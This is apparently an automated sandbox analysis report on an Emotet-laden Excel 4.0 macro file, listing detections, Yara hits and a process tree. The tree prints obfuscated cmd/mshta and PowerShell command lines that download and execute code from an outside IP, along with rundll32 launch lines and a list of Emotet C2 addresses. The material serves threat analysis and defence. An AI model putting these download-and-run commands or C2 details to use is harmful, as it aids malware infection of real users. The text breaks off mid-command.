Edit tour

Windows Analysis Report
1162545482187818.xls

Overview

General Information

Sample Name:	1162545482187818.xls
Analysis ID:	562434
MD5:	0a9833910735f0c8c9d663eb4a2b47ef
SHA1:	d273861b0b374857099a1556bf51626d56201472
SHA256:	c2829e1d302f93506778d37de2cd2b666ca891d095196ca4aa5345e5905f3721
Tags:	SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Antivirus detection for URL or domain

Found malicious Excel 4.0 Macro

Found malware configuration

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

Multi AV Scanner detection for domain / URL

Sigma detected: Windows Shell File Write to Suspicious Folder

Document contains OLE streams with names of living off the land binaries

Powershell drops PE file

Sigma detected: MSHTA Spawning Windows Shell

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Sigma detected: Suspicious MSHTA Process Patterns

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Suspicious PowerShell Command Line

Found Excel 4.0 Macro with suspicious formulas

Machine Learning detection for dropped file

Sigma detected: Mshta Spawning Windows Shell

C2 URLs / IPs found in malware configuration

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Abnormal high CPU Usage

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

Searches for the Microsoft Outlook file path

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Found large amount of non-executed APIs

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to delete services

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Enables debug privileges

PE file contains an invalid checksum

Yara detected Xls With Macro 4.0

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Creates a window with clipboard capturing capabilities

Document contains embedded VBA macros

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2592 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

cmd.exe (PID: 2696 cmdline: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

mshta.exe (PID: 2564 cmdline: mshta http://91.240.118.172/gg/ff/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)

powershell.exe (PID: 2908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 2656 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

rundll32.exe (PID: 236 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2308 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1456 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb",JsCTpK MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1832 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1200 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Amovlkfvdj\autlietzhmzgatf.inx",XsUjAXLCR MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2748 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Amovlkfvdj\autlietzhmzgatf.inx",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2540 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Twedmet\gxkvytixybpjnz.dhj",XxjhIN MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1972 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Twedmet\gxkvytixybpjnz.dhj",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
1162545482187818.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x12ca2:$s1: Excel 0x13d08:$s1: Excel 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
1162545482187818.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\1162545482187818.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x12ca2:$s1: Excel 0x13d08:$s1: Excel 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\1162545482187818.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security
C:\ProgramData\JooSee.dll	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000011.00000002.677590438.0000000000260000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000E.00000002.605063883.0000000000251000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.680400324.0000000010001000.00000020.00000001.01000000.0000000E.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.656694958.00000000007E1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.547984454.00000000028D0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.601617867.00000000001D0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.547866733.0000000002771000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.547659879.00000000022A0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.657128766.0000000003081000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.548291144.0000000003120000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.547521554.00000000004E0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.656764278.0000000000B81000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.547234287.0000000000340000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.656508765.0000000000530000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.677534692.0000000000221000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.656455241.0000000000501000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.656807259.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.657039086.0000000002BE1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.677470138.00000000001E0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.603206578.0000000010001000.00000020.00000001.01000000.0000000D.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.656328643.0000000000301000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000010.00000002.659295124.0000000010001000.00000020.00000001.01000000.0000000E.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.603148203.0000000003071000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.656913547.00000000025B1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.548336620.0000000003151000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.656273898.00000000002D0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000010.00000002.658858543.00000000002E1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.547596070.00000000007F1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.602465410.00000000020D0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.548156511.0000000002F10000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.602135379.0000000000700000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.602581342.0000000002741000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.548385196.0000000010001000.00000020.00000001.01000000.0000000C.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.602649396.00000000028D0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000B.00000002.549722399.0000000000400000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.657011784.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.657099652.0000000003050000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.657195935.0000000010001000.00000020.00000001.01000000.0000000E.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.547739583.0000000002321000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000E.00000002.605845584.0000000010001000.00000020.00000001.01000000.0000000D.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.547820098.00000000023E0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.603002835.0000000002E61000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.677639704.0000000000291000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.656380451.0000000000340000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.656726745.0000000000B50000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.602710616.0000000002930000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.602062854.00000000006D1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.496880032.0000000000770000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.548085066.0000000002E31000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.548199162.0000000002F41000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000E.00000002.605017420.00000000001D0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000B.00000002.549940138.0000000010001000.00000020.00000001.01000000.0000000C.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.602269654.0000000000870000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.602677407.0000000002901000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.602340992.00000000020A1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.602833934.0000000002E01000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.602929583.0000000002E30000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000010.00000002.658681536.0000000000140000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000B.00000002.549782146.0000000000641000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 57 entries

Unpacked PEs

Source	Rule	Description	Author
15.2.rundll32.exe.500000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.b80000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2e30000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3150000.13.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.260000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2f10000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.rundll32.exe.250000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.340000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3120000.12.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.4e0000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.340000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.700000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.22a0000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.20d0000.5.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.220000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.rundll32.exe.1d0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.rundll32.exe.2e0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.4e0000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.2930000.9.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.530000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.3070000.13.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.20d0000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.340000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.1e0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.2e30000.11.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.2740000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.3050000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.28d0000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.2900000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.2e60000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2bb0000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2d0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.rundll32.exe.140000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1d0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.bf0000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.700000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.380000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.rundll32.exe.1d0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.b50000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2d0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.28d0000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.340000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.770000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.bf0000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.2e00000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.7e0000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1d0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2f40000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2770000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2be0000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.260000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.290000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.870000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3120000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.23e0000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.23e0000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.b50000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.rundll32.exe.140000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2320000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.870000.3.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.1e0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.300000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.3080000.13.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2f10000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.25b0000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.2930000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.28d0000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.20a0000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.2e30000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.7f0000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2bb0000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.530000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.28d0000.7.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.3050000.12.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.770000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.6d0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.rundll32.exe.400000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.rundll32.exe.640000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.rundll32.exe.400000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.22a0000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.7a0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.10000000.14.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.10000000.14.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.10000000.14.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.10000000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 84 entries

Sigma Overview

System Summary

Sigma detected: Windows Shell File Write to Suspicious Folder

Source: File created

Author: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2564, TargetFilename: C:\Users\user\AppData\Local

Sigma detected: MSHTA Spawning Windows Shell

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); 